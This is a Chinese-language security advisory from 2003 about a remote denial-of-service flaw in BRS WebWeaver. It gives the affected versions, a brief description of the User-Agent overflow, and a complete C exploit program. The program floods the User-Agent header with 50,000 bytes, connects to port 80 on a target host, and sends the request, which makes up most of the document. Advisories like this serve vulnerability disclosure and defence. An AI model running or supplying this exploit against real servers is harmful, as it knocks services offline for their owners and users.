发布时间:2003-11-04
更新时间:2003-11-04
严重程度:中
威胁程度:远程拒绝服务
错误类型:边界检查错误
利用方式:服务器模式
BUGTRAQ ID:8947
受影响系统 BRS WebWeaver 62 beta
BRS WebWeaver 0.49 beta
BRS WebWeaver 0.50 beta
BRS WebWeaver 0.51 beta
BRS WebWeaver 0.52 beta
BRS WebWeaver 0.60 beta
BRS WebWeaver 0.61 beta
BRS WebWeaver 0.62 beta
BRS WebWeaver 0.63 beta
BRS WebWeaver 1.0 6
BRS WebWeaver 1.0 5
BRS WebWeaver 1.0 4
BRS WebWeaver 1.0 3
BRS WebWeaver 1.0 2
BRS WebWeaver 1.0 1
详细描述
BRS WebWeaver是支持CGI
,ISAPI
,SSI和基于IP地址
安全的WEB服务程序
。
当BRS WebWeaver接收到包含超长字符串的`User-Agent`字段时,可导致服务程序停止响应
。
测试代码
/*
* BRS WebWeaver v.1.06 remote DoS exploit
*
* -d4rkgr3y [d4rk securitylab ru]
*
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#define port 80
main(int argc, char **argv) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd, i;
const c = 50000;
char request[50150] =
"GET /m00-r0cz HTTP/1.0\n"
"Accept: */*\n"
"Accept-Language: jp\n"
"Accept-Encoding: gzip, deflate\n"
"Host: m00security.org\n"
"User-Agent: ";
printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");
if (argc!=2){
printf("usage\n %s hostname\n\n",argv[0]);
exit(1);
}
//memset((request+98),0x41,c);
memset((request+strlen(request)),0x41,c);
/* l33t ;] */
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x43;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x63;
request[strlen(request)] = 0x74;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x6f;
request[strlen(request)] = 0x6e;
request[strlen(request)] = 0x3a;
request[strlen(request)] = 0x20;
request[strlen(request)] = 0x4b;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
request[strlen(request)] = 0x2d;
request[strlen(request)] = 0x41;
request[strlen(request)] = 0x6c;
request[strlen(request)] = 0x69;
request[strlen(request)] = 0x76;
request[strlen(request)] = 0x65;
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x0a;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if ((hs=gethostbyname(argv[1]))==NULL) {
printf("damn");
exit(1);
}
printf("~ Host resolved.\n");
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("damn"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("damn"); exit(0);
}
printf("~ Socket connected\n");
printf("~ Sending evil code... ");
write(sockfd,request,strlen(request));
printf("done\n\n");
close(sockfd);
}
/* m00 */
相关信息
d4rkgr3y <d4rk@securitylab.ru>.
参考:
http://www.securityfocus.com/archive/1/343111